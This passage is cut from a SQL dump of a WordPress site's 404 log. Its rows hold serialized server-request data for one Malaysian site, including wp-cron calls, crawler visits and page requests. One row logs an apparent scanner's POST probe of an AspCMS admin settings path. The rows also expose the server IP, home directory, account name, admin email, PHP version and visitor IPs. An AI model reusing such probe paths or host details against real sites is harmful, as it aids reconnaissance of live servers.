Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.76.217.210\";s:11:\"REMOTE_PORT\";s:5:\"62236\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY9eYrIa2crZSgQ0QEMKxQAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569676898.9416\";s:12:\"REQUEST_TIME\";s:10:\"1569676898\";}}','notice','2019-09-28 13:21:44','2019-09-28 13:21:39',35606144,37408976,'https://bintara.com.my/?page_id=18',1,0,'82.76.217.210'),(27275,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY9IEwqEUDQMUjh8Zmu2zwAAAEk\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.85\";s:11:\"REMOTE_PORT\";s:5:\"59756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY9IEwqEUDQMUjh8Zmu2zwAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569671187.723\";s:12:\"REQUEST_TIME\";s:10:\"1569671187\";}}','notice','2019-09-28 11:46:34','2019-09-28 11:46:32',35484960,37284272,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.85'),(27274,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569669307.3263750076293945312500\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569669307.3263750076293945312500\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569669307.3263750076293945312500\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569669307.3263750076293945312500\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"42348\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569669307.3263750076293945312500\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY9Au3QrfbvYuOCKuiMQQQAAAMw\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY9Au3QrfbvYuOCKuiMQQQAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"42348\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY9Au3QrfbvYuOCKuiMQQQAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569670219.0817\";s:12:\"REQUEST_TIME\";s:10:\"1569670219\";}}','notice','2019-09-28 11:30:20','2019-09-28 11:30:19',35207224,35460560,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569669307.3263750076293945312500',1,0,'103.6.198.69'),(27529,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:122:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-artwork%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:120:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-artwork%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"64986\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZhIO69vOBPs-wjzaPZwRwAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570261051.817\";s:12:\"REQUEST_TIME\";s:10:\"1570261051\";}}','notice','2019-10-05 07:37:34','2019-10-05 07:37:32',35023592,36822544,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-artwork%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27528,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.128.136\";s:11:\"REMOTE_PORT\";s:5:\"56449\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZg9j46KolNh-REHWYQSZgAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570258319.6677\";s:12:\"REQUEST_TIME\";s:10:\"1570258319\";}}','notice','2019-10-05 06:52:03','2019-10-05 06:52:00',35415448,37224528,'https://bintara.com.my/?page_id=18',1,0,'108.161.128.136'),(27527,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:35:\"/mailbox-migration-exchange-online/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:57:\"https://bintara.com.my/mailbox-migration-exchange-online/\";s:19:\"REDIRECT_SCRIPT_URL\";s:35:\"/mailbox-migration-exchange-online/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZg1vr-TGwg8JtoKWMV@vQAAAAc\";s:12:\"REDIRECT_URL\";s:35:\"/mailbox-migration-exchange-online/\";s:11:\"REMOTE_ADDR\";s:11:\"13.66.139.0\";s:11:\"REMOTE_PORT\";s:5:\"45440\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:57:\"https://bintara.com.my/mailbox-migration-exchange-online/\";s:10:\"SCRIPT_URL\";s:35:\"/mailbox-migration-exchange-online/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZg1vr-TGwg8JtoKWMV@vQAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570256319.0641\";s:12:\"REQUEST_TIME\";s:10:\"1570256319\";}}','notice','2019-10-05 06:18:43','2019-10-05 06:18:39',35035848,36847504,'https://bintara.com.my/mailbox-migration-exchange-online/',1,0,'13.66.139.0'),(27135,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569582558.5242140293121337890625\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569582558.5242140293121337890625\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569582558.5242140293121337890625\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569582558.5242140293121337890625\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"58120\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569582558.5242140293121337890625\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY3t3lmRD3dexc-X2CVqIQAAAM4\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY3t3lmRD3dexc-X2CVqIQAAAM4\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"58120\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY3t3lmRD3dexc-X2CVqIQAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";